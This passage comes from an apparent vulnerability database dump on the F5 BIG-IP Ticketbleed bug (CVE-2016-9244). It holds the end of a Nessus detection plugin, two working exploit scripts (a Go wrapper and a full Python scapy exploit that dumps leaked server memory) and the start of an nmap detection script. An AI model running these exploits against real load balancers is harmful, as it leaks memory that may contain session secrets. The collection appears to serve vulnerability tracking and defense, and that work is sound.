ssl_find(\n blob:data,\n encrypted:TRUE,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE\n );\n if (!isnull(rec) && srv_change_cipher_spec_received)\n {\n if (isnull(session_ticket))\n {\n close(soc);\n return [FALSE, \"lied_about_ticket\", \"Server did not send a session ticket despite indicating support.\"];\n }\n\n # TLS 1.1 explicitly includes the IV in the record\n if (version >= TLS_11)\n {\n tls_keys['dec_iv'] = substr(data, 5, strlen(tls_keys['dec_iv']) + 4);\n rec[\"data\"] = substr(data, 5 + strlen(tls_keys['dec_iv']));\n }\n\n tls_ciphertext = aes_cbc_decrypt(\n data:rec[\"data\"],\n iv:tls_keys['dec_iv'],\n key:tls_keys['dec_key']\n );\n\n # Retain CBC residue for the next record\n if (version == TLS_10)\n tls_keys['dec_iv'] = tls_ciphertext[1];\n\n tls_ciphertext = tls_ciphertext[0];\n finished = ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_FINISHED,\n data:ssl_calc_finished(\n master:master_secret,\n handshake:handshake_transcript,\n is_client:FALSE,\n version:version,\n cipher_desc:cipher_desc\n )\n );\n finished += tls_mac(\n key:tls_keys['dec_mac_key'],\n seq:0,\n version:version,\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n cipher_desc:cipher_desc,\n data:finished\n );\n finished = tls_pad(data:finished);\n if (finished != tls_ciphertext)\n {\n close(soc);\n return [FALSE, \"srv_finished\", \"Server's Finished value or MAC is wrong or key agreement failed.\"];\n }\n\n # Server's finished and first encrypted record was correct, so we're\n # ready to send again and have agreed correctly on some keys\n break;\n }\n }\n\n # We're ready to try resuming, with a new connection.\n close(soc);\n soc = open_sock_ssl(port);\n if (!soc)\n return [FALSE, \"open_sock_ssl\", \"Couldn't open TCP or STARTTLS socket to service to resume.\"];\n\n # We send a 20-byte session ID. 
Max length is 32 bytes.\n session_id = rand_str(length:20);\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(TLS_10), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n sessionid:session_id,\n extensions:tls_ext(type:35, data:session_ticket)\n );\n send(socket:soc, data:data);\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"resume\", \"Server didn't reply to resumed connection attempt.\"];\n }\n\n # We're done receiving now\n close(soc);\n\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n if (isnull(rec))\n return [FALSE, \"resume_serverhello\", \"Server did not reply with a ServerHello to the resumed connection attempt.\"];\n\n if (rec[\"session_id\"] == session_id)\n return [FALSE, \"session_id_mismatch\", \"Server replied with a session ID that matches exactly what Nessus sent.\"];\n\n if (strlen(rec[\"session_id\"]) == 0)\n return [FALSE, \"session_id_zero\", \"Server replied with a zero-length session ID.\"];\n\n # Vulnerable!\n # Is the session ID from the server bigger than what we sent, and, does it start with the session ID we picked?\n if (strlen(rec[\"session_id\"]) > strlen(session_id) && substr(rec[\"session_id\"], 0, strlen(session_id) - 1) == session_id)\n return [\n TRUE,\n \"session_id_length\",\n \"Nessus sent the \" + strlen(session_id) + \"-byte session ID \" + hexstr(session_id) + \". 
The server replied with the \" + strlen(rec[\"session_id\"]) + \"-byte session ID \" + hexstr(rec[\"session_id\"]) + \".\"\n ];\n\n return [FALSE, \"assertion_failure\", \"Something went wrong with the test.\"];\n}\n\nget_kb_item_or_exit('SSL/Supported');\n\n# Get a port that uses SSL.\nport = get_ssl_ports(fork:TRUE);\n\nif (isnull(port))\n exit(1, 'The host does not appear to have any SSL-based services.');\n\n# Find out if the port is open.\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port, \"TCP\");\n\nresult = attack(port:port, ciphers:\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'] + # <- Required by all TLS 1.2 impls.\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_128_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_RSA_WITH_AES_256_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_256_CBC_SHA256']\n);\n\nif (result[0] == TRUE)\n{\n security_report_v4(\n port:port,\n severity:SECURITY_WARNING,\n extra:result[2]\n );\n}\nelse\n{\n exit(0, \"Port \" + port + \": \" + result[2]);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nF5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure", "edition": 1, "published": "2017-02-10T00:00:00", "title": "F5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-10T00:00:00", "id": "EXPLOITPACK:EE5EA4ECE0C61538EC30487A371A1C90", "href": "", "sourceData": "/*\n# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]\n# Date: [10.02.2017]\n# Exploit Author: [Ege Balc\u0131]\n# Vendor Homepage: [https://f5.com/]\n# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]\n# Tested on: [Multiple]\n# CVE : 
[CVE-2016-9244]\n\n\n\n\nBUILD:\n\tgo get github.com/EgeBalci/Ticketbleed\n\tgo build Ticketbleed.go\n\nUSAGE:\n\t./ticketbleed <options> <ip:port>\nOPTIONS:\n\t-o, --out \tOutput filename for raw memory\n\t-s, --size \tSize in bytes to read\n\t-h, --help \tPrint this message\n\n*/\npackage main\n\nimport \"github.com/EgeBalci/Ticketbleed\"\nimport \"strconv\"\nimport \"strings\"\nimport \"fmt\"\nimport \"os\"\n\n\nvar OutputFile string = \"\"\nvar BleedSize int = 0\n\nfunc main() {\n\n\n\tARGS := os.Args[1:]\n\tif len(ARGS) < 1 || len(ARGS) > 5{\n\t\tfmt.Println(Help)\n\t\tos.Exit(1)\n\t}\n\n \tfor i := 0; i < len(ARGS); i++{\n\n\t\tif ARGS[i] == \"-h\" || ARGS[i] == \"--help\"{\n\t\t\tfmt.Println(Help)\n\t\t\tos.Exit(1)\n\t \t}\n\n\t\tif ARGS[i] == \"-o\" || ARGS[i] == \"--out\"{\n\t\t\tOutputFile = ARGS[i+1]\n\t \t}\n\n\t \tif ARGS[i] == \"-s\" || ARGS[i] == \"--size\"{\n\t \t\tSize,err := strconv.Atoi(ARGS[i+1])\n\t \t\tif err != nil {\n\t \t\t\tfmt.Println(\"[-] ERROR: Invalid size value !\")\n\t \t\t\tos.Exit(1)\n\t \t\t}\n\t \t\tif Size < 0 {\n\t \t\t\tfmt.Println(\"[-] ERROR: Size can't be smaller than 0\")\n\t \t\t\tos.Exit(1)\n\t \t\t}else{\n\t \t\t\tBleedSize = Size\n\t \t\t}\n\t \t}\n \t}\n\n\tif OutputFile != \"\" {\n\t\tFile, FileErr := os.Create(OutputFile)\n\t\tif FileErr != nil {\n\t\t\tfmt.Println(\"[-] ERROR: While creating output file !\")\n\t\t\tos.Exit(1)\n\t\t}\n\t\tFile.Close()\n\t\tfmt.Println(\"[*] Output file: \"+OutputFile)\n\t}\n\n \tVulnStatus := Ticketbleed.Check(ARGS[0])\t\t\t\t\t\t\t\t// First check if it's vulnerable\n \tfmt.Println(VulnStatus)\n \tif strings.Contains(VulnStatus, \"[+]\") {\n \t\t\n \t\tgo Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2)) \t\t// With using multiple threads it is easyer to move on stack\n \t\tTicketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))\t\t\t\t// Othervise server echoes back alot of duplicate value\n \t}\n\n}\n\n\n\nvar Help string = 
`\n\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u20ac\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e\u00e2\u2013\u201e \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e \n\u00e2\u2013\u201c \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u20ac\u00e2\u2013\u02c6 \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac\u00e2\u2013\u201c \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac 
\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u0152\n\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u02c6\u00e2\u2013\u0152\n\u00e2\u2013\u2018 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u201c\u00e2\u2013\u201e \u00e2\u2013\u201e\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6 \u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e\u00e2\u2013\u2018 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018 
\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e \u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u201e \u00e2\u2013\u2018\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u201e \u00e2\u2013\u0152\n \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac \u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u02c6\u00e2\u2013\u201e\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u201c\u00e2\u2013\u02c6 \u00e2\u2013\u20ac\u00e2\u2013\u02c6\u00e2\u2013\u201c\u00e2\u2013\u2018\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u201c \n \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u201c \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2019\u00e2\u2013\u2019 \u00e2\u2013\u201c\u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2018 
\u00e2\u2013\u2018\u00e2\u2013\u2019\u00e2\u2013\u201c\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u02c6\u00e2\u2013\u20ac\u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u201c \u00e2\u2013\u2018\u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2019\u00e2\u2013\u201c \u00e2\u2013\u2019 \n \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2019\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019\u00e2\u2013\u2018\u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2019 \n \u00e2\u2013\u2018 \u00e2\u2013\u2019 \u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018\u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \n \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \n \u00e2\u2013\u2018 \u00e2\u2013\u2018 \u00e2\u2013\u2018 \n\nAuthor: Ege Balci\nGithub: github.com/EgeBalci\n\n\nUSAGE: \n\t./ticketbleed <ip:port> <options> \nOPTIONS:\n\t-o, --out \tOutput filename for raw memory\n\t-s, --size \tSize in bytes to read\n\t-h, 
--help \tPrint this message\n`\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:14", "description": "\nF5 BIG-IP 11.6 SSL Virtual Server - Ticketbleed Memory Disclosure", "edition": 1, "published": "2017-02-14T00:00:00", "title": "F5 BIG-IP 11.6 SSL Virtual Server - Ticketbleed Memory Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-14T00:00:00", "id": "EXPLOITPACK:4DF698AC9A73D3D4108BA1E66FD1CF8C", "href": "", "sourceData": "# -*- coding: utf-8 -*-\n#!/usr/bin/python\n# Exploit Title: Ticketbleed\n# Google Dork: n/a\n# Date: Exploit: 02/13/17, Advisory Published: 02/09/17 \n# Exploit Author: @0x00string\n# Vendor Homepage: https://f5.com/\n# Software Link: https://support.f5.com/csp/article/K05121675\n# Version: see software link for versions\n# Tested on: F5 BIGIP 11.6\n# CVE : CVE-2016-9244\n# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)\nimport re, getopt, sys, socket\nfrom struct import *\ntry:\n from scapy_ssl_tls.ssl_tls import *\nexcept ImportError:\n from scapy.layers.ssl_tls import *\n\ndef banner():\n print '''\n lol ty filippo!\n ty tintinweb!\n 0000000000000\n 0000000000000000000 00\n 00000000000000000000000000000\n 0000000000000000000000000000000\n 000000000 0000000000\n 00000000 0000000000\n 0000000 000000000000\n 0000000 000000000000000\n 000000 000000000 000000\n0000000 000000000 000000\n000000 000000000 000000\n000000 000000000 000000\n000000 00000000 000000\n000000 000000000 000000\n0000000 000000000 0000000\n 000000 000000000 000000\n 0000000000000000 0000000\n 0000000000000 0000000\n 00000000000 00000000\n 00000000000 000000000\n 0000000000000000000000000000000\n 00000000000000000000000000000\n 000 0000000000000000000\n 0000000000000\n 
@0x00string\nhttps://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py\n'''\n\ndef usage ():\n print (\"python script.py <args>\\n\"\n \" -h, --help: Show this message\\n\"\n \" -a, --rhost: Target IP address\\n\"\n \" -b, --rport: Target port\\n\"\n \"\\n\\n\"\n \"Examples:\\n\"\n \"python script.py -a 10.10.10.10 -b 443\\n\"\n \"python script.py --rhost 10.10.10.10 --rport 8443\")\n exit()\n\ndef pretty (t, m):\n if (t is \"+\"):\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"-\"):\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"*\"):\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"!\"):\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\n\ndef createDump (input):\n d, b, h = '', [], []\n u = list(input)\n for e in u:\n h.append(e.encode(\"hex\"))\n if e == '0x0':\n b.append('0')\n elif 30 > ord(e) or ord(e) > 128:\n b.append('.')\n elif 30 < ord(e) or ord(e) < 128:\n b.append(e)\n\n i = 0\n while i < len(h):\n if (len(h) - i ) >= 16:\n d += ' '.join(h[i:i+16])\n d += \" \"\n d += ' '.join(b[i:i+16])\n d += \"\\n\"\n i = i + 16\n else:\n d += ' '.join(h[i:(len(h) - 0 )])\n pad = len(' '.join(h[i:(len(h) - 0 )]))\n d += ' ' * (56 - pad)\n d += ' '.join(b[i:(len(h) - 0 )])\n d += \"\\n\"\n i = i + len(h)\n return d\n\ndef ticketBleed (rhost, rport):\n h = (rhost,int(rport));\n version = TLSVersion.TLS_1_2\n secret = \"\"\n session_ticket = \"\"\n sid = \"\"\n cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA\n with TLSSocket(socket.socket(), client=True) as sock:\n sock.connect(h)\n ctx = sock.tls_ctx\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=\"\")])\n sock.sendall(packet)\n sock.recvall()\n \tpacket_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()\n packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()\n 
sock.sendall(TLS.from_records([packet_ke, packet_ccs]))\n sock.sendall(to_raw(TLSFinished(), ctx))\n ret = sock.recvall()\n session_ticket = ret[TLSSessionTicket].ticket\n secret = ctx.master_secret\n #pretty(\"*\", \"ctx 1: \\n\" + str(ctx))\n with TLSSocket(socket.socket(), client=True) as sock:\n sock.connect(h)\n ctx = sock.tls_ctx\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id=\"A\", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])\n sock.tls_ctx.resume_session(secret)\n sock.sendall(packet)\n ret = sock.recvall()\n sid = ret[TLSServerHello].session_id\n #pretty(\"*\", \"ctx 2: \\n\" + str(ctx))\n pretty(\"+\", \"bled 'A' + 31 bytes: \\n\" + createDump(sid))\n\ndef main():\n rhost = None;\n rport = None;\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])\n for opt, arg in options:\n if opt in ('-h', '--help'):\n usage()\n elif opt in ('-a','--rhost'):\n rhost = arg;\n elif opt in ('-b','--rport'):\n rport = arg;\n banner()\n if rhost is None or rport is None:\n usage()\n ticketBleed(rhost,rport)\n exit(0);\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:06:03", "description": "Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244). \n\nFor additional information: \n\n * https://filippo.io/Ticketbleed/\n * https://blog.filippo.io/finding-ticketbleed/\n * https://support.f5.com/csp/article/K05121675\n\n## Script Arguments \n\n#### tls-ticketbleed.protocols \n\n(default tries all) TLSv1.0, TLSv1.1, or TLSv1.2\n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. 
\n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -p 443 --script tls-ticketbleed <target>\n \n\n## Script Output \n \n \n | tls-ticketbleed:\n | VULNERABLE:\n | Ticketbleed is a serious issue in products manufactured by F5, a popular\n vendor of TLS load-balancers. The issue allows for stealing information from\n the load balancer\n | State: VULNERABLE (Exploitable)\n | Risk factor: High\n | Ticketbleed is vulnerability in the implementation of the TLS\n SessionTicket extension found in some F5 products. It allows the leakage\n (\"bleeding\") of up to 31 bytes of data from uninitialized memory. 
This is\n caused by the TLS stack padding a Session ID, passed from the client, with\n data to make it 32-bits long.\n | Exploit results:\n | 2ab2ea6a4c167fbe8bf0b36c7d9ed6d3\n | *..jL......l}...\n | References:\n | https://filippo.io/Ticketbleed/\n | https://blog.filippo.io/finding-ticketbleed/\n |_ https://support.f5.com/csp/article/K05121675\n \n\n## Requires \n\n * nmap\n * packet\n * shortport\n * sslcert\n * stdnse\n * table\n * tableaux\n * tls\n * vulns\n * rand\n\n* * *\n", "edition": 14, "published": "2017-02-09T21:30:14", "title": "tls-ticketbleed NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "modified": "2018-11-06T15:07:01", "id": "NMAP:TLS-TICKETBLEED.NSE", "href": "https://nmap.org/nsedoc/scripts/tls-ticketbleed.html", "sourceData": "local nmap = require(\"nmap\")\nlocal packet = require \"packet\"\nlocal shortport = require(\"shortport\")\nlocal sslcert = require(\"sslcert\")\nlocal stdnse = require(\"stdnse\")\nlocal table = require(\"table\")\nlocal tableaux = require \"tableaux\"\nlocal tls = require \"tls\"\nlocal vulns = require(\"vulns\")\nlocal rand = require \"rand\"\n\ndescription = [[\nDetects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).\n\nFor additional information:\n* https://filippo.io/Ticketbleed/\n* https://blog.filippo.io/finding-ticketbleed/\n* https://support.f5.com/csp/article/K05121675\n]]\n\n---\n-- @usage\n-- nmap -p 443 --script tls-ticketbleed <target>\n--\n-- @output\n-- | tls-ticketbleed:\n-- | VULNERABLE:\n-- | Ticketbleed is a serious issue in products manufactured by F5, a popular\n-- vendor of TLS load-balancers. The issue allows for stealing information from\n-- the load balancer\n-- | State: VULNERABLE (Exploitable)\n-- | Risk factor: High\n-- | Ticketbleed is vulnerability in the implementation of the TLS\n-- SessionTicket extension found in some F5 products. 
It allows the leakage\n-- (\"bleeding\") of up to 31 bytes of data from uninitialized memory. This is\n-- caused by the TLS stack padding a Session ID, passed from the client, with\n-- data to make it 32-bits long.\n-- | Exploit results:\n-- | 2ab2ea6a4c167fbe8bf0b36c7d9ed6d3\n-- | *..jL......l}...\n-- | References:\n-- | https://filippo.io/Ticketbleed/\n-- | https://blog.filippo.io/finding-ticketbleed/\n-- |_ https://support.f5.com/csp/article/K05121675\n--\n-- @args tls-ticketbleed.protocols (default tries all) TLSv1.0, TLSv1.1, or TLSv1.2\n\nauthor = \"Mak Kolybabi <mak@kolybabi.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\ndependencies = {\"https-redirect\"}\n\nportrule = function(host, port)\n if not tls.handshake_parse.NewSessionTicket then\n stdnse.verbose1(\"Not running: incompatible tls.lua. Get the latest from 